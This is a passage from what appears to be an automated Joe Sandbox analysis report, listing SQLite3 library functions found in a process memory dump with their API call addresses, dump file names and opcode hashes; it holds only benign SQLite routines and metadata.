                                                                          • sqlite3_value_text16.SQLITE3 ref: 60925100
                                                                          • sqlite3_value_text16.SQLITE3 ref: 6092512C
                                                                          • sqlite3_mutex_leave.SQLITE3 ref: 6092513E
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                                          • Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: sqlite3_value_text16$sqlite3_logsqlite3_mutex_entersqlite3_mutex_leave
                                                                          • String ID: library routine called out of sequence$out of memory
                                                                          • API String ID: 2019783549-3029887290
                                                                          • Opcode ID: bf8b25fefa583efc99e02b0fe9019e927645d1a19242a42ec125398c6bed8d9e
                                                                          • Instruction ID: f6310061860eb79c45c0a7b6efb00bde58ba827c5a391e7df96a4cb3fbc4cfa9
                                                                          • Opcode Fuzzy Hash: bf8b25fefa583efc99e02b0fe9019e927645d1a19242a42ec125398c6bed8d9e
                                                                          • Instruction Fuzzy Hash: 81014C70A083049BDB14AF69C9C170EBBE6BF64248F0488A9EC958F30EE775D8818B51
                                                                          Function 609406CF Relevance: 10.5, APIs: 7, Instructions: 40COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • sqlite3_finalize.SQLITE3 ref: 609406E3
                                                                            • Part of subcall function 6094064B: sqlite3_log.SQLITE3 ref: 60940672
                                                                            • Part of subcall function 6094064B: sqlite3_log.SQLITE3 ref: 60940696
                                                                          • sqlite3_free.SQLITE3 ref: 609406F7
                                                                          • sqlite3_free.SQLITE3 ref: 60940705
                                                                          • sqlite3_free.SQLITE3 ref: 60940713
                                                                          • sqlite3_free.SQLITE3 ref: 6094071E
                                                                          • sqlite3_free.SQLITE3 ref: 60940729
                                                                          • sqlite3_free.SQLITE3 ref: 6094073C
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                                          • Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: sqlite3_free$sqlite3_log$sqlite3_finalize
                                                                          • String ID:
                                                                          • API String ID: 1159759059-0
                                                                          • Opcode ID: 19269ae46022e444f8470c890b78f38089a522c4155da373e534dfec766a18bc
                                                                          • Instruction ID: 8ceab58ab7f3fb7faec85fb80e78016d1f3d655de586deaf1cb04ee1bc4e3406
                                                                          • Opcode Fuzzy Hash: 19269ae46022e444f8470c890b78f38089a522c4155da373e534dfec766a18bc
                                                                          • Instruction Fuzzy Hash: C801E8B45447108BDB00AF78C4C5A59BBE5EF79B18F06096DECCA8B305D734D8809B91
                                                                          Function 60947378 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 292COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • sqlite3_free.SQLITE3(?), ref: 609476DD
                                                                            • Part of subcall function 60904423: sqlite3_mutex_leave.SQLITE3(6090449D,?,?,?,60908270), ref: 60904446
                                                                          • sqlite3_log.SQLITE3 ref: 609498F5
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                                          • Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: sqlite3_freesqlite3_logsqlite3_mutex_leave
                                                                          • String ID: List of tree roots: $d$|
                                                                          • API String ID: 3709608969-1164703836
                                                                          • Opcode ID: 4de08d56d8a6e192ae2dda07a929c8b2a00a3f2e2d212eb9bfb53aebfe2a6bac
                                                                          • Instruction ID: c91562837ba2d96ae21b52ab8334c840e7cbe23d8154f1acff92b465618a0bd4
                                                                          • Opcode Fuzzy Hash: 4de08d56d8a6e192ae2dda07a929c8b2a00a3f2e2d212eb9bfb53aebfe2a6bac
                                                                          • Instruction Fuzzy Hash: 3FE10570A043698BDB22CF18C88179DFBBABF65304F1185D9E858AB251D775DE81CF81
                                                                          Function 60960052 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 196COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 6095FFB2: sqlite3_bind_int64.SQLITE3 ref: 6095FFFA
                                                                            • Part of subcall function 6095FFB2: sqlite3_step.SQLITE3 ref: 60960009
                                                                            • Part of subcall function 6095FFB2: sqlite3_reset.SQLITE3 ref: 60960019
                                                                            • Part of subcall function 6095FFB2: sqlite3_result_error_code.SQLITE3 ref: 60960043
                                                                          • sqlite3_column_int64.SQLITE3 ref: 609600BA
                                                                          • sqlite3_column_text.SQLITE3 ref: 609600EF
                                                                          • sqlite3_free.SQLITE3 ref: 6096029A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                                          • Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: sqlite3_bind_int64sqlite3_column_int64sqlite3_column_textsqlite3_freesqlite3_resetsqlite3_result_error_codesqlite3_step
                                                                          • String ID: e
                                                                          • API String ID: 786425071-4024072794
                                                                          • Opcode ID: 373422d03c3c71c2ddc35291c61dfb2213fd8f263c0b9a30c36f02d650250dc2
                                                                          • Instruction ID: e80500568aa73e744b5c90812a7938b6c4ac38b40afb48beb036dafaf3e7d002
                                                                          • Opcode Fuzzy Hash: 373422d03c3c71c2ddc35291c61dfb2213fd8f263c0b9a30c36f02d650250dc2
                                                                          • Instruction Fuzzy Hash: 6291E270A18609CFDB04CF99C494B9EBBF2BF98314F108529E869AB354D774E885CF91
                                                                          Function 609470DE Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 110COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                                          • Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: sqlite3_exec
                                                                          • String ID: sqlite_master$sqlite_temp_master$|
                                                                          • API String ID: 2141490097-2247242311
                                                                          • Opcode ID: 0e32379bf9c90bcee3e658b343db186d73978ee403121efd96d42beb4ff38922
                                                                          • Instruction ID: 9143400cfb6dc20a8edc2ca7c04099347fc9d468871a1d2187ae3123f936d49a
                                                                          • Opcode Fuzzy Hash: 0e32379bf9c90bcee3e658b343db186d73978ee403121efd96d42beb4ff38922
                                                                          • Instruction Fuzzy Hash: C551B6B09083289BDB26CF18C885799BBFABF59304F108599E498A7351D775DA84CF41
                                                                          Function 60963637 Relevance: 7.8, APIs: 5, Instructions: 258COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                                          • Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: sqlite3_free$memcmpsqlite3_realloc
                                                                          • String ID:
                                                                          • API String ID: 3422960571-0
                                                                          • Opcode ID: 50eda45380483794e32bdd730fc6b6b580c41d30328003452ec2c22d7d846426
                                                                          • Instruction ID: 3b390e38dde49c5924589a602beaf2ee173d98914be71c714148da16d267e2cf
                                                                          • Opcode Fuzzy Hash: 50eda45380483794e32bdd730fc6b6b580c41d30328003452ec2c22d7d846426
                                                                          • Instruction Fuzzy Hash: 42B1D0B4E142189BEB05CFA9C5807DDBBF6BFA8304F148429E858A7344D374E946CF91
                                                                          Function 6094B137 Relevance: 7.7, APIs: 5, Instructions: 204COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 6090A0D5: sqlite3_free.SQLITE3 ref: 6090A118
                                                                          • sqlite3_malloc.SQLITE3 ref: 6094B1D1
                                                                          • sqlite3_value_bytes.SQLITE3 ref: 6094B24C
                                                                          • sqlite3_malloc.SQLITE3 ref: 6094B272
                                                                          • sqlite3_value_blob.SQLITE3 ref: 6094B298
                                                                          • sqlite3_free.SQLITE3 ref: 6094B2C8
                                                                            • Part of subcall function 6094A894: sqlite3_bind_int64.SQLITE3 ref: 6094A8C0
                                                                            • Part of subcall function 6094A894: sqlite3_step.SQLITE3 ref: 6094A8CE
                                                                            • Part of subcall function 6094A894: sqlite3_column_int64.SQLITE3 ref: 6094A8E9
                                                                            • Part of subcall function 6094A894: sqlite3_reset.SQLITE3 ref: 6094A90F
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                                          • Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: sqlite3_freesqlite3_malloc$sqlite3_bind_int64sqlite3_column_int64sqlite3_resetsqlite3_stepsqlite3_value_blobsqlite3_value_bytes
                                                                          • String ID:
                                                                          • API String ID: 683514883-0
                                                                          • Opcode ID: a6abbae8c6e8f2e89577a489a37bdbe998ef9662ada317e1813a59820f6ee2b0
                                                                          • Instruction ID: 83940ce9cf0a2bab7a741171fc95cc3a005d2848f59039768723a80715f2adcb
                                                                          • Opcode Fuzzy Hash: a6abbae8c6e8f2e89577a489a37bdbe998ef9662ada317e1813a59820f6ee2b0
                                                                          • Instruction Fuzzy Hash: E19133B1A052099FCB04CFA9D490B9EBBF6FF68314F108569E855AB341DB34ED81CB91
                                                                          Function 6093A1DD Relevance: 7.7, APIs: 5, Instructions: 157COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,?,?,6093A8DF), ref: 6093A200
                                                                          • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,?,?,6093A8DF), ref: 6093A391
                                                                          • sqlite3_mutex_free.SQLITE3(?,?,?,?,?,?,?,?,6093A8DF), ref: 6093A3A3
                                                                          • sqlite3_free.SQLITE3 ref: 6093A3BA
                                                                          • sqlite3_free.SQLITE3 ref: 6093A3C2
                                                                            • Part of subcall function 6093A0C5: sqlite3_mutex_enter.SQLITE3 ref: 6093A114
                                                                            • Part of subcall function 6093A0C5: sqlite3_mutex_free.SQLITE3 ref: 6093A152
                                                                            • Part of subcall function 6093A0C5: sqlite3_mutex_leave.SQLITE3 ref: 6093A162
                                                                            • Part of subcall function 6093A0C5: sqlite3_free.SQLITE3 ref: 6093A1A4
                                                                            • Part of subcall function 6093A0C5: sqlite3_free.SQLITE3 ref: 6093A1C3
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                                          • Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: sqlite3_free$sqlite3_mutex_leave$sqlite3_mutex_free$sqlite3_mutex_enter
                                                                          • String ID:
                                                                          • API String ID: 1903298374-0
                                                                          • Opcode ID: 8530df85f137a660efabd51ca86f4821d2fdcc6d7a3fd2cfb4f5547b241dda56
                                                                          • Instruction ID: f6c450fbbadf2e04ab128defb7df19fdb2a161b4e6cf4e71623f80625393026f
                                                                          • Opcode Fuzzy Hash: 8530df85f137a660efabd51ca86f4821d2fdcc6d7a3fd2cfb4f5547b241dda56
                                                                          • Instruction Fuzzy Hash: EB513870A047218BDB58DF69C8C074AB7A6BF65318F05896CECA69B305D735EC41CF91
                                                                          Function 6093A0C5 Relevance: 7.6, APIs: 5, Instructions: 98COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 60904396: sqlite3_mutex_try.SQLITE3(?,?,?,60908235), ref: 609043B8
                                                                          • sqlite3_mutex_enter.SQLITE3 ref: 6093A114
                                                                          • sqlite3_mutex_free.SQLITE3 ref: 6093A152
                                                                          • sqlite3_mutex_leave.SQLITE3 ref: 6093A162
                                                                          • sqlite3_free.SQLITE3 ref: 6093A1A4
                                                                          • sqlite3_free.SQLITE3 ref: 6093A1C3
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                                          • Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: sqlite3_free$sqlite3_mutex_entersqlite3_mutex_freesqlite3_mutex_leavesqlite3_mutex_try
                                                                          • String ID:
                                                                          • API String ID: 1894464702-0
                                                                          • Opcode ID: 7188b9a67afd66d207271078c150a83da37f36a2752b1b5804700c826a798ba9
                                                                          • Instruction ID: 8ebadd1dc7ee404a0f141fd21885e91e0aa1156a5a6df10951b92a0b718128ce
                                                                          • Opcode Fuzzy Hash: 7188b9a67afd66d207271078c150a83da37f36a2752b1b5804700c826a798ba9
                                                                          • Instruction Fuzzy Hash: CF313C70B086118BDB18DF79C8C1A1A7BFBBFB2704F148468E8418B219EB35DC419F91
                                                                          Function 6092535E Relevance: 7.6, APIs: 5, Instructions: 91COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 60925326: sqlite3_log.SQLITE3 ref: 60925352
                                                                          • sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,609254CC), ref: 6092538E
                                                                          • sqlite3_mutex_leave.SQLITE3 ref: 609253C4
                                                                          • sqlite3_log.SQLITE3 ref: 609253E2
                                                                          • sqlite3_log.SQLITE3 ref: 60925406
                                                                          • sqlite3_mutex_leave.SQLITE3 ref: 60925443
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                                          • Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: sqlite3_log$sqlite3_mutex_leave$sqlite3_mutex_enter
                                                                          • String ID:
                                                                          • API String ID: 3336957480-0
                                                                          • Opcode ID: 1198911827aa14b9fab328e6e7c73bc961b2278be0ca20fe6461460b1b30ceeb
                                                                          • Instruction ID: a100dd02d465b32589d57b5b9efe4db3cd483c3b5de54de748c9b161d5d001e2
                                                                          • Opcode Fuzzy Hash: 1198911827aa14b9fab328e6e7c73bc961b2278be0ca20fe6461460b1b30ceeb
                                                                          • Instruction Fuzzy Hash: D3315A70228704DBDB00EF28D49575ABBE6AFA1358F00886DE9948F36DD778C885DB02
                                                                          Function 60961389 Relevance: 7.6, APIs: 5, Instructions: 89COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • sqlite3_result_blob.SQLITE3 ref: 609613D0
                                                                          • sqlite3_column_int.SQLITE3 ref: 6096143A
                                                                          • sqlite3_data_count.SQLITE3 ref: 60961465
                                                                          • sqlite3_column_value.SQLITE3 ref: 60961476
                                                                          • sqlite3_result_value.SQLITE3 ref: 60961482
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                                          • Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: sqlite3_column_intsqlite3_column_valuesqlite3_data_countsqlite3_result_blobsqlite3_result_value
                                                                          • String ID:
                                                                          • API String ID: 3091402450-0
                                                                          • Opcode ID: 15f5c91e7d752206cb5be57281081ebbda5684d1dfb7c3b21a78c03d1c189b87
                                                                          • Instruction ID: 8b12398a3b1f37ca0d2e1a8d549e1f0529ecbd38da511dd0edd3444da8e5cc4d
                                                                          • Opcode Fuzzy Hash: 15f5c91e7d752206cb5be57281081ebbda5684d1dfb7c3b21a78c03d1c189b87
                                                                          • Instruction Fuzzy Hash: 72314DB19082058FDB00DF29C48064EB7F6FF65354F19856AE8999B361EB34E886CF81
                                                                          Function 60939097 Relevance: 7.6, APIs: 5, Instructions: 76COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                                          • Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: sqlite3_mutex_entersqlite3_mutex_leave$sqlite3_free
                                                                          • String ID:
                                                                          • API String ID: 251237202-0
                                                                          • Opcode ID: ee0aefbaff40cad113deb2524f723b57adfc4224f15c8691f87345bc20e459c1
                                                                          • Instruction ID: 8e14962182cb4ba31828fc05f1b37fa5954e33605a362b2e641de35f96add61e
                                                                          • Opcode Fuzzy Hash: ee0aefbaff40cad113deb2524f723b57adfc4224f15c8691f87345bc20e459c1
                                                                          • Instruction Fuzzy Hash: 022137B46087158BC709AF68C48570ABBF6FFA5318F10895DEC958B345DB74E940CB82
                                                                          Function 6091A2E8 Relevance: 7.6, APIs: 5, Instructions: 70COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • sqlite3_aggregate_context.SQLITE3 ref: 6091A31E
                                                                          • sqlite3_value_text.SQLITE3 ref: 6091A349
                                                                          • sqlite3_value_bytes.SQLITE3 ref: 6091A356
                                                                          • sqlite3_value_text.SQLITE3 ref: 6091A37B
                                                                          • sqlite3_value_bytes.SQLITE3 ref: 6091A387
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                                          • Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: sqlite3_value_bytessqlite3_value_text$sqlite3_aggregate_context
                                                                          • String ID:
                                                                          • API String ID: 4225432645-0
                                                                          • Opcode ID: e7dd5294350f58c57afd4f2551108a775ab72f2657aaaf635efeb712e258985e
                                                                          • Instruction ID: 24a20a1669ecabf1c8c9e0f75de4e20f6480f0c3e20d7f4799920e66bb4c3c2a
                                                                          • Opcode Fuzzy Hash: e7dd5294350f58c57afd4f2551108a775ab72f2657aaaf635efeb712e258985e
                                                                          • Instruction Fuzzy Hash: 3F21CF71B086588FDB009F29C48075E7BE7AFA4254F0484A8E894CF305EB34DC86CB91
                                                                          Function 60903571 Relevance: 7.6, APIs: 5, Instructions: 54COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • sqlite3_mutex_enter.SQLITE3(?,-00000200,?), ref: 6090359D
                                                                          • sqlite3_mutex_leave.SQLITE3(?,-00000200,?), ref: 609035E0
                                                                          • sqlite3_mutex_enter.SQLITE3(?,-00000200,?), ref: 609035F9
                                                                          • sqlite3_mutex_leave.SQLITE3(?,-00000200,?), ref: 60903614
                                                                          • sqlite3_free.SQLITE3(?,-00000200,?), ref: 6090361C
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                                          • Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: sqlite3_mutex_entersqlite3_mutex_leave$sqlite3_free
                                                                          • String ID:
                                                                          • API String ID: 251237202-0
                                                                          • Opcode ID: d176fa110bd2286076a254f1a84b89a7a2b75649dc4a807f2bdee778eef171d4
                                                                          • Instruction ID: 98a7ce7f1ce2ff6a0e5ca4ca87ec4bf20a5c319c62b2fc6798152503390b0136
                                                                          • Opcode Fuzzy Hash: d176fa110bd2286076a254f1a84b89a7a2b75649dc4a807f2bdee778eef171d4
                                                                          • Instruction Fuzzy Hash: B211FE725186218BCB00EF7DC8C16197FE7FB66358F01491DE866D7362D73AD480AB42
                                                                          Function 609441F6 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 262COMMON
                                                                          Download Yara Rule
